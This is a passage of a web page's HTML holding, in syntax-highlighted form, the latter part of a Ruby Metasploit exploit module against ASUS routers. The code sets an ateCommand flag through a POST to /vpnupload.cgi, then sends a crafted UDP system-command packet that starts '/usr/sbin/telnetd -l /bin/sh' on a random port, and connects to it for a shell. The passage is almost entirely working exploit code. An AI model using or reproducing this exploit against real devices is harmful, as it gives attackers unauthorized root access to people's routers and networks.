class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a66636295042778926259-72\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-s\">&#8216;uri&#8217;<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;\/vpnupload.cgi&#8221;<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a66636295042778926259-73\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-s\">&#8216;method&#8217;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;POST&#8217;<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a66636295042778926259-74\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-s\">&#8216;rport&#8217;<\/span><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">datastore<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-s\">&#8216;ASUSWRTPORT&#8217;<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a66636295042778926259-75\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-s\">&#8216;data&#8217;<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">data<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a66636295042778926259-76\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-s\">&#8216;ctype&#8217;<\/span><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;multipart\/form-data; boundary=#{post_data.bound}&#8221;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a66636295042778926259-77\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">}<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a66636295042778926259-78\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5a66636295042778926259-79\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">res <\/span><span class=\"crayon-st\">and<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">res<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">code<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">==<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">200<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a66636295042778926259-80\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">print_good<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;#{peer} &#8211; Successfully set the ateCommand_flag variable.&#8221;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a66636295042778926259-81\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">else<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a66636295042778926259-82\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">fail_with<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">Failure<\/span><span class=\"crayon-o\">::<\/span><span class=\"crayon-v\">Unknown<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;#{peer} &#8211; Failed to set ateCommand_flag variable.&#8221;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a66636295042778926259-83\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">end<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a66636295042778926259-84\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a66636295042778926259-85\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a66636295042778926259-86\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-p\"># &#8230; but we like to do it more cleanly, so let&#8217;s send the PKT_SYSCMD as described in the comments above.&nbsp;&nbsp;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a66636295042778926259-87\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">info_pdu_size<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">512<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-p\"># expected packet size, not sure what the extra bytes are<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a66636295042778926259-88\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">r<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">Random<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">new<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a66636295042778926259-89\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a66636295042778926259-90\"><span class=\"crayon-e\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">ibox_comm_pkt_hdr_ex<\/span><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-o\">=<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a66636295042778926259-91\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">0x0c<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">pack<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8216;C*&#8217;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-p\"># NET_SERVICE_ID_IBOX_INFO\t0xC<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a66636295042778926259-92\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">0x15<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">pack<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8216;C*&#8217;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-p\"># NET_PACKET_TYPE_CMD 0x15<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a66636295042778926259-93\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">0x33<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">0x00<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">pack<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8216;C*&#8217;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-p\"># NET_CMD_ID_MANU_CMD 0x33<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a66636295042778926259-94\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">r<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">bytes<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">4<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-p\"># Info, don&#8217;t know what this is<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a66636295042778926259-95\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">r<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">bytes<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">6<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-p\"># MAC address<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a66636295042778926259-96\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">r<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">bytes<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">32<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-p\"># Password<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a66636295042778926259-97\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a66636295042778926259-98\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">telnet_port<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">rand<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">2<\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-cn\">16<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-cn\">1024<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-cn\">1024<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a66636295042778926259-99\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">cmd<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;\/usr\/sbin\/telnetd -l \/bin\/sh -p #{telnet_port}&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">0x00<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">pack<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8216;C*&#8217;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a66636295042778926259-100\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">pkt_syscmd<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a66636295042778926259-101\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-v\">cmd<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">length<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">0x00<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">pack<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8216;C*&#8217;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-p\"># cmd length<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a66636295042778926259-102\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">cmd<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-p\"># our command<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a66636295042778926259-103\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a66636295042778926259-104\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">pkt_final<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">ibox_comm_pkt_hdr_ex<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">pkt_syscmd<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">r<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">bytes<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">info_pdu_size<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">ibox_comm_pkt_hdr_ex<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">pkt_syscmd<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">length<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a66636295042778926259-105\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a66636295042778926259-106\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">connect_udp<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a66636295042778926259-107\"><span class=\"crayon-e\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">udp_sock<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">put<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">pkt_final<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-p\"># we could process the response, but we don&#8217;t care<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a66636295042778926259-108\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">disconnect_udp&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a66636295042778926259-109\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a66636295042778926259-110\"><span class=\"crayon-e\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">print_status<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;#{peer} &#8211; Packet sent, let&#8217;s sleep 10 seconds and try to connect to the router on port #{telnet_port}&#8221;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a66636295042778926259-111\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">sleep<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">10<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a66636295042778926259-112\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a66636295042778926259-113\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">begin<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a66636295042778926259-114\"><span class=\"crayon-e\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">ctx<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;Msf&#8217;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">framework<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;MsfExploit&#8217;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-r\">self<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a66636295042778926259-115\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">sock<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">Rex<\/span><span class=\"crayon-o\">::<\/span><span class=\"crayon-v\">Socket<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">create_tcp<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">{<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;PeerHost&#8217;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">rhost<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;PeerPort&#8217;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">telnet_port<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;Context&#8217;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">ctx<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;Timeout&#8217;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">10<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">}<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a66636295042778926259-116\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">not<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">sock<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">nil<\/span><span class=\"crayon-sy\">?<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a66636295042778926259-117\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">print_good<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;#{peer} &#8211; Success, shell incoming!&#8221;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a66636295042778926259-118\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">handler<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">sock<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a66636295042778926259-119\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">end<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a66636295042778926259-120\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">rescue <\/span><span class=\"crayon-v\">Rex<\/span><span class=\"crayon-o\">::<\/span><span class=\"crayon-v\">AddressInUse<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">::<\/span><span class=\"crayon-v\">Errno<\/span><span class=\"crayon-o\">::<\/span><span class=\"crayon-v\">ETIMEDOUT<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">Rex<\/span><span class=\"crayon-o\">::<\/span><span class=\"crayon-v\">HostUnreachable<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">Rex<\/span><span class=\"crayon-o\">::<\/span><span class=\"crayon-v\">ConnectionTimeout<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">Rex<\/span><span class=\"crayon-o\">::<\/span><span class=\"crayon-v\">ConnectionRefused<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">::<\/span><span class=\"crayon-v\">Timeout<\/span><span class=\"crayon-o\">::<\/span><span class=\"crayon-v\">Error<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">::<\/span><span class=\"crayon-v\">EOFError<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">e<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a66636295042778926259-121\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">sock<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">close <\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">sock<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a66636295042778926259-122\"><span class=\"crayon-e\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">end<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a66636295042778926259-123\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a66636295042778926259-124\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">print_bad<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;#{peer} &#8211; Well that didn&#8217;t work&#8230; try again?&#8221;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a66636295042778926259-125\"><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-st\">end<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a66636295042778926259-126\"><span class=\"crayon-st\">end<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0120 seconds] -->  <\/p>\n<div class=\"printfriendly pf-alignleft\"><a href=\"#\" rel=\"nofollow\" onclick=\"window.print(); return false;\" class=\"noslimstat\" title=\"Printer Friendly, PDF &#038; Email\"><img decoding=\"async\" 